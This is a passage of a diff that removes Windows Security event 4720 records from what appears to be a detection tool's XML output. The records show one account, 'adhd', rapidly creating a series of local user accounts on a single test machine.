-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Brenda</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4639</recordid>
-            <time>2020-06-11 22:05:00.628014300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.6280143Z'/&gt;&lt;EventRecordID&gt;4639&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Diane&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1099&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Diane&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Diane</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4633</recordid>
-            <time>2020-06-11 22:05:00.533536900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.5335369Z'/&gt;&lt;EventRecordID&gt;4633&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Billy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1098&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Billy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Billy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4627</recordid>
-            <time>2020-06-11 22:05:00.455572300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.4555723Z'/&gt;&lt;EventRecordID&gt;4627&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Megan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1097&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Megan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Megan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4621</recordid>
-            <time>2020-06-11 22:05:00.373644300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.3736443Z'/&gt;&lt;EventRecordID&gt;4621&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Zachary&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1096&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Zachary&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Zachary</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4615</recordid>
-            <time>2020-06-11 22:05:00.266796400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.2667964Z'/&gt;&lt;EventRecordID&gt;4615&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Diana&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1095&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Diana&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Diana</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4609</recordid>
-            <time>2020-06-11 22:05:00.185004300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.1850043Z'/&gt;&lt;EventRecordID&gt;4609&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Carl&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1094&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Carl&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Carl</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4603</recordid>
-            <time>2020-06-11 22:04:59.957718700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.9577187Z'/&gt;&lt;EventRecordID&gt;4603&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Olivia&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1093&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Olivia&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Olivia</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4597</recordid>
-            <time>2020-06-11 22:04:59.880188300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.8801883Z'/&gt;&lt;EventRecordID&gt;4597&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Michelle&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1092&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Michelle&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Michelle</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4591</recordid>
-            <time>2020-06-11 22:04:59.654860600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.6548606Z'/&gt;&lt;EventRecordID&gt;4591&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Danielle&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1091&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Danielle&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

